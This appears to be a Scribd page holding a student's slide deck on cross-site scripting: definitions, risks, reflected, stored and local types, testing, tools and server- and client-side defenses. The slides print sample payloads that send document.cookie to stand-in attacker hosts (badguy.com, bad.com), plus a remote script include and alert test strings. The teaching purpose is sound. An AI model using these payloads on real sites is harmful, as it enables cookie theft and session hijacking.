Scribd
Upload
322 views

Cross Site Scripting (XSS)

Cross Site Scripting (XSS) allows malicious code to be inserted and executed in a trusted website. There are three main types of XSS attacks: reflected (non-persistent), stored (persistent), and local. XSS risks include stealing cookies, hijacking sessions, and spying on users. Developers can prevent XSS by validating all user inputs, encoding outputs, and using web application firewalls.

Uploaded by

Shiva Raju
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
322 views

Cross Site Scripting (XSS)

Cross Site Scripting (XSS) allows malicious code to be inserted and executed in a trusted website. There are three main types of XSS attacks: reflected (non-persistent), stored (persistent), and local. XSS risks include stealing cookies, hijacking sessions, and spying on users. Developers can prevent XSS by validating all user inputs, encoding outputs, and using web application firewalls.

Uploaded by

Shiva Raju
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
You are on page 1/ 18

Cross Site Scripting (XSS)

R.SIVA(IV CSE) Cross

Cross Site Scripting: Outline


Definition Risks Cross Site Scripting Types Testing Tools All Together Defense References

Definition
Cross Site Scripting (XSS) is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is The trusted website is used to store, transport, or deliver malicious content to the victim The target is to trick the client browser to execute malicious scripting commands JavaScript, VBScript, ActiveX, HTML, or Flash Caused by insufficient input validation.

Cross Site Scripting Risks


XSS can : Steal cookies Hijack of users session Unauthorized access Modify content of the web page Inserting words or images Misinform Bad reputation Spy on what you do Network Mapping XSS viruses

Cross Site Scripting Types


Three known types:
Reflected (Non-Persistent)
Link in other website or email

Stored (Persistent)
Forum, bulletin board, feedback form

Local
PDF Adobe Reader , FLASH player

Reflected (Non-Persistent)
1
Send e-mail with <script> tags embedded in the link.

http://mybank.com/ account.php?variable=><script>document.lo cation=http://www.badguy.com/cgi-bin/ cookie.cgi%20+document.cookie</script>

Follows link and the script executes

2
www.badguy.com Cookie collector

Malicious content dose not get stored in the server The server bounces the original input to the victim without modification

Stored (Persistent)
Public forum web site

1
Attacker Upload malicious scripting commands to the public forum

Great message! <script> var img=new Image(); img.src= "http://www.bad.com/CookieStealer/ Form1.aspx?s= "+document.cookie; </script>

Downlaod malicious code


Victim

Browse

The server stores the malicious content The server serves the malicious content in its original form

Local
1
Attacker Send e-mail with a link Http://freeebook.com/ haha.pdf#a=javascript:alert(Boo);

Victim

2
Request for http://freeebook.com/haha.pdf Ignore everything after #

PDF Viewer gets the full URL from browser (including the content after # ) PDF Viewer executes the Javascript.

The injected script does not traverse to the server Arising fast as the major threat as the other two types of XSS are getting fixed

Cross Site Scripting Testing


Where to start?
Search box Feedback/Guestbook Application forms Look for input that can be displayed back by the site <script>alert(Boo)</script>

Dont forget to test with different encoding scheme


Base64, URL, Unicode

Cross Site Scripting Tools


N-stalker Acunetix Paros Firefox add-ons
Hackbar XSS ME

Cross Site Scripting All Together

Cross Site Scripting All Together

Cross Site Scripting All Together

Cross Site Scripting All Together

Cross Site Scripting All Together

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Cross Site Scripting All Together

Cross Site Scripting Defense


Clint side
Disable JS Verify email Always update

Server side
Input validation (Black listing VS White listing) Encode all meta characters send to the client keep track of user sessions Web application firewall Always test

Cross Site Scripting: References


RSnake, XSS Cheat Sheet http://ha.ckers.org/xss.html XSS Attack information http://xssed.com/ OWASP Testing for XSS http://www.owasp.org/index.php/Testing_for_Cross_site_scripting Klein, A., DOM Based Cross Site Scripting http://www.webappsec.org/projects/articles/071105.shtml Acunetix web application security http://www.acunetix.com N-stalker http://www.nstalker.com How to use XSS ME http://a4apphack.com/index.php/featured/secfox-xssme-automated-xss-detection-infirefoxpart-3 SANS Web Application Security Workshop

You might also like